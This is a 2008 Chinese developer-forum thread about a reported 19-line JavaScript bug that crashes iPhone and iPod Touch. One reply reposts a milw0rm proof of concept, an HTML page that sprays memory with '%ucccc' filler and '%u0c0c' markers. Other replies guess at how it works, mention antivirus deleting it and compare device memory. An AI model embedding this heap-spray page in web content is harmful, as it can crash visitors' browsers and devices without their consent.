论坛首页 移动开发技术论坛

19行js代码击垮iPhone与iPod Touch-试着写一写.

浏览 4465 次
精华帖 (0) :: 良好帖 (0) :: 新手帖 (0) :: 隐藏帖 (0)
作者 正文
   发表时间:2008-02-09  
iOS
引用
19行js代码击垮iPhone与iPod Touch

ugmbbc发布于 2008-02-08 10:58:02|3579 次阅读 字体:大 小 打印预览


安全研究人员发现了iPhone与iPod Touch的危急漏洞,可以导致内存耗尽后的拒绝服务.
攻击者只需要使用一段只有19行的Javascript代码就可以轻松让使用Mac OS X移动版系统内核崩溃并重新启动.
这一代码可以随意嵌入页面让iPhone崩溃,但没有迹象表明它能偷窃数据.



目前苹果没有给出任何修复方案,只能禁用JavaScript以保证安全,

原文见这里

手头没有iPhone没有iPod Touch,但是这些是可编程的东西。手头有IE,有FF。可以模拟一半~

一个小想法,还得靠大家,顺着新闻写个19行。~
   发表时间:2008-02-09  
我猜是递归...
0 请登录后投票
   发表时间:2008-02-10  
jvm 只需要一句 System.exist(0);
0 请登录后投票
   发表时间:2008-02-10  
代码来了。。哪位大侠解释下到底在干哈?
<html><body><script>

function Demo() {

	var shellcode;
	var addr;
	var fill;
			
	alert('attempting a crash!');
	shellcode = unescape('%u0c0c');
	fill = unescape('%ucccc');
	addr = 0x02020202;
		
	var b = fill;
	while (b.length <= 0x40000) b+=b;

	var c = new Array();
	for (var i =0; i<36; i++) {
		c[i] = 
			b.substring(0,  0x100000 - shellcode.length) + shellcode +
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode;
	}
	
}

</script>

<input type='button' onClick='Demo()' value='Go!'>

</body></html>

# milw0rm.com [2008-01-24]
0 请登录后投票
   发表时间:2008-02-10  
以“%u0c0c”google一番,发现竟是内存溢出的最简单手法。。。












参考资料1
参考资料2
参考资料3
参考资料4
0 请登录后投票
   发表时间:2008-02-10  
直接被mcafee删除...
0 请登录后投票
   发表时间:2008-02-10  
windowsXP下吞噬掉200M内存,,,iPhone内存多大?。。。足够溢出了?。。
0 请登录后投票
   发表时间:2008-02-10  
自问自答了 足够。。。
引用

手机类型 智能手机;音乐手机;拍照手机
手机制式 GSM
支持频段 GSM850/900/1800/1900MHz
屏幕材质 TFT
屏幕色彩 1600万色彩屏
主屏尺寸 3.5英寸
主屏参数 480×320分辨率
触摸屏 支持
操作系统 Mac OS X系统 v10.4.8
硬件系统 ARM1176JZ-F 核心
图形处理单元:Power-VR SG引擎
内存:128M Mobile DDR
基本配置 锂电池、立体声耳机 (可接听电话)、充电器、支架连接到USB Cable,USB电源插头、说明书、清洁布
理论通话时间 大于8小时
理论待机时间 大于250小时
上市日期 2007年6月29日(美国上市)

0 请登录后投票
   发表时间:2008-02-13  
直接字符串相加就可以溢出吗?直接从数据区溢出到代码区?
0 请登录后投票
论坛首页 移动开发技术版

跳转论坛:
Global site tag (gtag.js) - Google Analytics